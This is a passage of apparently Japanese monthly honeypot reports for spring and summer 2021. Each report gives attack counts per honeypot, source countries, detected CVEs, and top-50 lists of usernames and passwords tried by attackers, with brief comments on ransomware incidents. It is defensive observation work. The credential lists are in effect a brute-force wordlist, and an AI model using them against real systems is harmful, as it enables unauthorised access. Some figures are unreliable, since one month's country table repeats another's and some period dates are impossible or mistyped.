| 6 | Adbhoney | 14,700 | 19 |
| 7 | Mailoney | 10,842 | ▲10,216 |
| 8 | Tanner | 4,201 | ▲4,855 |
| 9 | ConPot | 2,101 | 652 |
| 10 | CitrixHoneypot | 1,510 | 75 |
| 11 | Ciscoasa | 1,419 | ▲838 |
| 12 | ElasticPot | 1,269 | ▲167 |
| 13 | Medpot | 156 | ▲1,921 |
- Result
- 特記事項は無し。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Ireland | 1,716,881 | 1(→) |
| 2 | Russia | 1,161,544 | 2(→) |
| 3 | Netherlands | 860,138 | 5(↑) |
| 4 | China | 770,235 | 4(→) |
| 5 | Panama | 530,447 | 8(↑) |
| 6 | Vietnam | 432,792 | 3(↓) |
| 7 | United States | 347,849 | 7(→) |
| 8 | India | 345,303 | 6(↓) |
| 9 | Brazil | 173,598 | 9(→) |
| 10 | Indonesia | 153,339 | 10(→) |
| 11 | France | 118,731 | 圏外(↑) |
| 12 | Venezuela | 116,310 | 11(↓) |
| 13 | Romania | 112,847 | 圏外(↑) |
| 14 | Republic of Moldova | 98,421 | 圏外(↑) |
| 15 | Turkey | 88,126 | 12(↓) |
| 16 | Taiwan | 80,050 | 14(↓) |
| 17 | Germany | 79,789 | 圏外(↑) |
| 18 | Bulgaria | 77,013 | 18(→) |
| 19 | Thailand | 76,710 | 圏外(↑) |
| 20 | Egypt | 75,033 | 16(↓) |
- Result
- 特記事項は無し。
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | CNT |
|---|---|---|
| 1 | CVE-2020-11899 | 1,270,391 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 52 |
| 3 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 26 |
| 4 | CVE-2020-11910 | 7 |
| 5 | CVE-2021-27561 CVE-2021-27561 CVE-2021-27562 CVE-2021-27561 | 2 |
| 6 | CVE-2020-8515 CVE-2020-8515 | 1 |
- Result
参考URL: ssd-disclosure.com www.fortiguard.com unit42.paloaltonetworks.jp
6月の観測では香港とノルウェーから1件ずつアクセスを観測しており、どちらもニュージーランドの同一のDropperサイトからlolol.shのダウンロードを試みていた。
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 262,827 |
| 2 | admin | 121,643 |
| 3 | support | 10,543 |
| 4 | user | 8,316 |
| 5 | test | 7,660 |
| 6 | guest | 4,348 |
| 7 | sa | 2,946 |
| 8 | postgres | 2,336 |
| 9 | nproc | 2,293 |
| 10 | info | 2,269 |
| 11 | sales | 2,127 |
| 12 | besadmin | 2,042 |
| 13 | sale | 2,042 |
| 14 | ftpuser | 1,757 |
| 15 | backup | 1,614 |
| 16 | 22 | 1,572 |
| 17 | Admin | 1,558 |
| 18 | 1,495 | |
| 19 | weblogic | 1,455 |
| 20 | inspur | 1,374 |
| 21 | administrator | 1,305 |
| 22 | server | 1,187 |
| 23 | webmaster | 1,139 |
| 24 | service | 1,121 |
| 25 | scan | 1,023 |
| 26 | adobe | 1,021 |
| 27 | chairman | 1,021 |
| 28 | scanner | 1,021 |
| 29 | ubnt | 622 |
| 30 | operator | 618 |
| 31 | ubuntu | 527 |
| 32 | oracle | 525 |
| 33 | 101 | 485 |
| 34 | adm | 446 |
| 35 | www | 421 |
| 36 | mysql | 381 |
| 37 | web | 377 |
| 38 | 666666 | 361 |
| 39 | nagios | 361 |
| 40 | debug | 355 |
| 41 | unknown | 349 |
| 42 | 2Wire | 348 |
| 43 | git | 332 |
| 44 | ftp | 323 |
| 45 | !root | 320 |
| 46 | sh | 320 |
| 47 | es | 314 |
| 48 | system | 311 |
| 49 | testuser | 298 |
| 50 | apache | 296 |
- Result
- besadminはIBM BigFix製品の管理者アカウントになる。
- !root はネットワーク関連の管理者アカウントになる際のアカウントになる。
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | admin | 241,071 |
| 2 | & | 30,089 |
| 3 | root | 11,179 |
| 4 | support | 9,296 |
| 5 | 7,978 | |
| 6 | user | 5,415 |
| 7 | 123456 | 4,780 |
| 8 | test | 4,632 |
| 9 | password | 3,524 |
| 10 | 1234 | 3,421 |
| 11 | 123 | 2,767 |
| 12 | nproc | 2,293 |
| 13 | 12345 | 1,856 |
| 14 | 1 | 1,639 |
| 15 | Admin | 1,402 |
| 16 | 12345678 | 1,204 |
| 17 | ubnt | 964 |
| 18 | qwerty | 941 |
| 19 | 1qaz2wsx | 911 |
| 20 | 123qwe | 796 |
| 21 | blank | 779 |
| 22 | 1234567 | 762 |
| 23 | 123456789 | 727 |
| 24 | 1q2w3e4r | 712 |
| 25 | 1q2w3e | 664 |
| 26 | 12 | 658 |
| 27 | guest | 582 |
| 28 | pass | 567 |
| 29 | operator | 566 |
| 30 | 0 | 524 |
| 31 | 101 | 517 |
| 32 | p@ssw0rd | 517 |
| 33 | 111111 | 506 |
| 34 | 666666 | 492 |
| 35 | q1w2e3 | 488 |
| 36 | qwe123 | 485 |
| 37 | q1w2e3r4 | 475 |
| 38 | passw0rd | 464 |
| 39 | p@ssword | 463 |
| 40 | test123 | 456 |
| 41 | master | 426 |
| 42 | backup | 410 |
| 43 | 321 | 407 |
| 44 | alpine | 398 |
| 45 | hi3518 | 389 |
| 46 | unknown | 385 |
| 47 | synnet | 367 |
| 48 | abc123 | 366 |
| 49 | passwd | 345 |
| 50 | 123123 | 314 |
- Result
- サーバやクライアントに設定するパスワードは引き続き注意!!
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
ハニーポット運用(月次報告:2021年5月)
今月のTopics
海外から衝撃的なニュースが飛び込んできた。
5月7日アメリカの大手燃料送油管企業であるColonial Pipeline社がランサムウェア「Darkside」の被害を受け操業停止に追い込まれた。
重要インフラへの攻撃は商業活動への被害に止まらず、日常生活へ直接的な影響を及ぼすためより深刻になる。
攻撃を行ったサイバー犯罪集団「Darkside」は「非政治的」な組織であること、政治的や地質学的な意図が無かったことを声明で伝えている。 www.newsweekjapan.jp
"Our goal is to make money and not creating problems for society," DarkSide wrote on its website.
"We do not participate in geopolitics, do not need to tie us with a defined government and look for... our motives," the group added.
営利目的の組織による攻撃でさえこれほど広範囲の影響が発生したことを踏まえ、国家間の紛争における被害はIT化が進んだ現代では図りしれない。まさに「第5の戦場」である。
今月のChangelog
更新無し。
前提条件
運用日時:2021年5月1日-2020年5月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Cowrie | 3,941,064 | ▲757,450 |
| 2 | Heralding | 1,003,345 | 81,130 |
| 3 | Honeytrap | 716,733 | 202,134 |
| 4 | Dionaea | 339,492 | ▲2,083,131 |
| 5 | Rdpy | 166,914 | 43,061 |
| 6 | Mailoney | 21,058 | ▲3,938 |
| 7 | Adbhoney | 14,681 | 289 |
| 8 | Tanner | 9,056 | 4,087 |
| 9 | Ciscoasa | 2,257 | ▲1,676 |
| 10 | Medpot | 2,077 | 1,870 |
| 11 | ConPot | 1,449 | ▲880 |
| 12 | ElasticPot | 1,436 | 18 |
| 13 | CitrixHoneypot | 1,435 | ▲133 |
- Result
- Dionaeaの件数が86%低下した。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Ireland | 1,969,940 | 1(→) |
| 2 | Netherlands | 847,224 | 18(↑) |
| 3 | Russia | 660,581 | 2(↓) |
| 4 | China | 547,377 | 4(→) |
| 5 | Panama | 472,454 | 6(↑) |
| 6 | United States | 326,196 | 5(↓) |
| 7 | Romania | 160,465 | 圏外(↑) |
| 8 | France | 98,741 | 圏外(↑) |
| 9 | United Kingdom | 91,938 | 圏外(↑) |
| 10 | India | 90,628 | 7(↓) |
| 11 | Indonesia | 65,176 | 9(↓) |
| 12 | Bulgaria | 60,206 | 圏外(↑) |
| 13 | Vietnam | 59,672 | 3(↓) |
| 14 | Brazil | 46,110 | 8(↓) |
| 15 | Singapore | 45,020 | 圏外(↑) |
| 16 | Germany | 44,696 | 11(↓) |
| 17 | South Korea | 42,417 | 圏外(↑) |
| 18 | Japan | 39,835 | 12(↓) |
| 19 | Monaco | 39,616 | 圏外(↑) |
| 20 | Hong Kong | 27,223 | 圏外(↑) |
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | CNT |
|---|---|---|
| 1 | CVE-2020-11899 | 3,849,302 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 347 |
| 3 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 32 |
| 4 | CVE-2020-11910 | 5 |
| 5 | CVE-2020-11902 | 1 |
- Result
- 新規の攻撃は無し。
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 290,751 |
| 2 | admin | 106,928 |
| 3 | user | 46,115 |
| 4 | sa | 15,025 |
| 5 | support | 11,469 |
| 6 | Admin | 5,030 |
| 7 | ubnt | 3,254 |
| 8 | test | 1,904 |
| 9 | nproc | 1,836 |
| 10 | guest | 1,808 |
| 11 | postgres | 1,441 |
| 12 | 22 | 1,439 |
| 13 | 1,437 | |
| 14 | oracle | 987 |
| 15 | ubuntu | 878 |
| 16 | git | 808 |
| 17 | deploy | 668 |
| 18 | operator | 640 |
| 19 | mysql | 628 |
| 20 | 101 | 605 |
| 21 | hadoop | 572 |
| 22 | test1 | 567 |
| 23 | nagios | 564 |
| 24 | es | 510 |
| 25 | ftpuser | 486 |
| 26 | user1 | 485 |
| 27 | dev | 478 |
| 28 | tomcat | 469 |
| 29 | test2 | 432 |
| 30 | jenkins | 428 |
| 31 | zabbix | 418 |
| 32 | www | 390 |
| 33 | user2 | 379 |
| 34 | debian | 349 |
| 35 | vagrant | 346 |
| 36 | odoo | 344 |
| 37 | user8 | 340 |
| 38 | admin1 | 337 |
| 39 | developer | 336 |
| 40 | test5 | 334 |
| 41 | test4 | 329 |
| 42 | testuser | 328 |
| 43 | web | 328 |
| 44 | demo | 321 |
| 45 | adm | 318 |
| 46 | ts3 | 318 |
| 47 | elasticsearch | 311 |
| 48 | user3 | 308 |
| 49 | test3 | 305 |
| 50 | elastic | 303 |
- Result
- test1~test5やtestuserといったOSログイン用のユーザが検出されているのが興味深い。
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | admin | 257,517 |
| 2 | & | 34,561 |
| 3 | user | 33,022 |
| 4 | root | 31,219 |
| 5 | 1234 | 17,355 |
| 6 | support | 11,000 |
| 7 | 123456 | 10,582 |
| 8 | password | 6,423 |
| 9 | 5,487 | |
| 10 | Admin | 5,314 |
| 11 | ubnt | 3,583 |
| 12 | 123 | 3,162 |
| 13 | nproc | 1,836 |
| 14 | 12345 | 1,816 |
| 15 | 12345678 | 1,658 |
| 16 | 1 | 1,400 |
| 17 | qwerty | 1,203 |
| 18 | 123456789 | 1,169 |
| 19 | p@ssw0rd | 1,167 |
| 20 | passw0rd | 1,042 |
| 21 | 1q2w3e4r | 1,037 |
| 22 | test | 1,016 |
| 23 | 1234567 | 999 |
| 24 | 1qaz2wsx | 985 |
| 25 | 123qwe | 878 |
| 26 | guest | 864 |
| 27 | qwe123 | 839 |
| 28 | p@ssword | 837 |
| 29 | P@ssw0rd | 822 |
| 30 | 12 | 759 |
| 31 | q1w2e3r4 | 721 |
| 32 | 1q2w3e | 714 |
| 33 | q1w2e3 | 692 |
| 34 | operator | 669 |
| 35 | 101 | 646 |
| 36 | password123 | 634 |
| 37 | Password | 631 |
| 38 | 111111 | 628 |
| 39 | 1qaz@WSX | 586 |
| 40 | test123 | 554 |
| 41 | Passw0rd | 526 |
| 42 | P@$$w0rd | 484 |
| 43 | Aa123456 | 483 |
| 44 | 1234567890 | 462 |
| 45 | master | 437 |
| 46 | pass | 416 |
| 47 | 666666 | 414 |
| 48 | 321 | 398 |
| 49 | qwerty123 | 380 |
| 50 | alpine | 379 |
- Result
12345678といった数字の羅列やp@ssw0rdのOSの複雑性を回避するためによく使われるパスワードが良く狙われている。ユーザ名の検出結果と併せると端末側へのアクセスを狙った攻撃が増加していると推測される。
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- massscanはちらほらアクセスあり。5月30日のアクセスが最多。
- Zmapはmasscanと比較して、よく使われている。
最後に
ハニーポット運用(月次報告:2021年4月)
今月のTopics
2021年4月13日 株式会社カプコンにて不正アクセスに関する調査結果に対するプレスリリースがされた。
旧型VPN装置を踏み台としたサイバー攻撃により、社内ネットワークへ不正侵入が発生し、ランサムウェア被害と脅迫が犯行グループ「Ragnar Locker」から行なわれた。
IPA様から発表された「情報セキュリティ10大脅威 2021」にもある通り、ランサムウェア被害が増加傾向にある模様だ。
ランサムウェアにより暗号化したデータを復旧するための 金銭要求に加え、暗号化する前にデータを窃取しておき、 支払わなければデータを公開する等と脅迫する 「二重の脅迫(double extortion)」と呼ばれる攻撃も確認 されている。 近年、個人よりも多額の金銭の支払いを見込めるためか、 組織が狙われやすい傾向にある。
最近は暗号化データの復旧だけでなく社外秘情報の漏洩に対する2重の金銭要求が多いとのこと。犯行グループの脅し方のこなれた感じが、腹立たしい。
今月のChangelog
更新無し。
前提条件
運用日時:2021年4月1日-2021年4月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Cowrie | 4,698,514 | △249,473 |
| 2 | Dionaea | 2,422,623 | ▲3,480,503 |
| 3 | Heralding | 922,215 | △165,396 |
| 4 | Honeytrap | 514,599 | △161,809 |
| 5 | Rdpy | 123,853 | △21,972 |
| 6 | Mailoney | 24,996 | ▲775 |
| 7 | Adbhoney | 14,392 | ▲1,224 |
| 8 | Tanner | 4,969 | ▲1,925 |
| 9 | Ciscoasa | 3,933 | △1,407 |
| 10 | ConPot | 2,329 | △830 |
| 11 | CitrixHoneypot | 1,568 | △174 |
| 12 | ElasticPot | 1,418 | △442 |
| 13 | Medpot | 207 | △10 |
- Result
- Dionaeaの件数が59%低下した。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Ireland | 1,716,881 | 1(→) |
| 2 | Russia | 1,161,544 | 2(→) |
| 3 | Netherlands | 860,138 | 5(↑) |
| 4 | China | 770,235 | 4(→) |
| 5 | Panama | 530,447 | 8(↑) |
| 6 | Vietnam | 432,792 | 3(↓) |
| 7 | United States | 347,849 | 7(→) |
| 8 | India | 345,303 | 6(↓) |
| 9 | Brazil | 173,598 | 9(→) |
| 10 | Indonesia | 153,339 | 10(→) |
| 11 | France | 118,731 | 圏外(↑) |
| 12 | Venezuela | 116,310 | 11(↓) |
| 13 | Romania | 112,847 | 圏外(↑) |
| 14 | Republic of Moldova | 98,421 | 圏外(↑) |
| 15 | Turkey | 88,126 | 12(↓) |
| 16 | Taiwan | 80,050 | 14(↓) |
| 17 | Germany | 79,789 | 圏外(↑) |
| 18 | Bulgaria | 77,013 | 18(→) |
| 19 | Thailand | 76,710 | 圏外(↑) |
| 20 | Egypt | 75,033 | 16(↓) |
- Result
- ニュージーランドからのアクセスが再び増加していた。
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | CNT |
|---|---|---|
| 1 | CVE-2020-11899 | 3,809,785 |
| 2 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 35 |
| 3 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 12 |
| 4 | CVE-2020-11910 | 2 |
- Result
- 新規の攻撃は無し。
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 275,752 |
| 2 | admin | 124,868 |
| 3 | support | 16,455 |
| 4 | ubnt | 15,914 |
| 5 | test | 9,213 |
| 6 | user | 6,457 |
| 7 | nproc | 4,244 |
| 8 | guest | 3,529 |
| 9 | sa | 3,269 |
| 10 | 3,258 | |
| 11 | postgres | 3,257 |
| 12 | ubuntu | 3,214 |
| 13 | oracle | 2,169 |
| 14 | git | 2,033 |
| 15 | ftpuser | 1,883 |
| 16 | 22 | 1,504 |
| 17 | mysql | 1,336 |
| 18 | deploy | 1,310 |
| 19 | minecraft | 1,116 |
| 20 | testuser | 1,054 |
| 21 | www | 1,032 |
| 22 | demo | 1,028 |
| 23 | nagios | 1,009 |
| 24 | teamspeak | 970 |
| 25 | Admin | 965 |
| 26 | ftp | 942 |
| 27 | server | 893 |
| 28 | ts3 | 850 |
| 29 | dev | 835 |
| 30 | jenkins | 790 |
| 31 | hadoop | 752 |
| 32 | user1 | 739 |
| 33 | web | 734 |
| 34 | student | 688 |
| 35 | tomcat | 679 |
| 36 | 101 | 676 |
| 37 | administrator | 663 |
| 38 | test1 | 662 |
| 39 | steam | 642 |
| 40 | alex | 621 |
| 41 | www-data | 593 |
| 42 | tester | 569 |
| 43 | developer | 555 |
| 44 | webmaster | 534 |
| 45 | sysadmin | 531 |
| 46 | ts | 509 |
| 47 | temp | 502 |
| 48 | pi | 498 |
| 49 | vbox | 492 |
| 50 | sinusbot | 487 |
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | admin | 301,568 |
| 2 | & | 24,536 |
| 3 | 123456 | 16,672 |
| 4 | ubnt | 16,250 |
| 5 | support | 15,731 |
| 6 | 7,805 | |
| 7 | 123 | 7,458 |
| 8 | password | 7,393 |
| 9 | 1234 | 6,099 |
| 10 | test | 5,251 |
| 11 | root | 4,848 |
| 12 | nproc | 4,244 |
| 13 | 12345 | 3,607 |
| 14 | 1 | 2,900 |
| 15 | 12345678 | 1,607 |
| 16 | user | 1,363 |
| 17 | 123123 | 1,354 |
| 18 | 1q2w3e4r | 1,306 |
| 19 | guest | 1,295 |
| 20 | 123456789 | 1,219 |
| 21 | qwerty | 1,154 |
| 22 | 1qaz2wsx | 1,100 |
| 23 | test123 | 997 |
| 24 | pass | 926 |
| 25 | a | 922 |
| 26 | Admin | 867 |
| 27 | password123 | 802 |
| 28 | 123321 | 775 |
| 29 | passw0rd | 769 |
| 30 | p@ssw0rd | 755 |
| 31 | abc123 | 753 |
| 32 | 111111 | 730 |
| 33 | 123qwe | 714 |
| 34 | 101 | 705 |
| 35 | P@ssw0rd | 696 |
| 36 | 1234567 | 606 |
| 37 | changeme | 594 |
| 38 | qwe123 | 587 |
| 39 | Password | 542 |
| 40 | admin123 | 537 |
| 41 | q1w2e3r4 | 498 |
| 42 | pass123 | 486 |
| 43 | 666666 | 474 |
| 44 | 1qaz@WSX | 466 |
| 45 | alpine | 436 |
| 46 | master | 422 |
| 47 | operator | 420 |
| 48 | qwerty123 | 413 |
| 49 | princess | 409 |
| 50 | iloveyou | 404 |
- Result
- 脆弱なパスワードとして123456やpassword、qwertyが一般的であるが、princessやiloveyouなども有名のようだ。
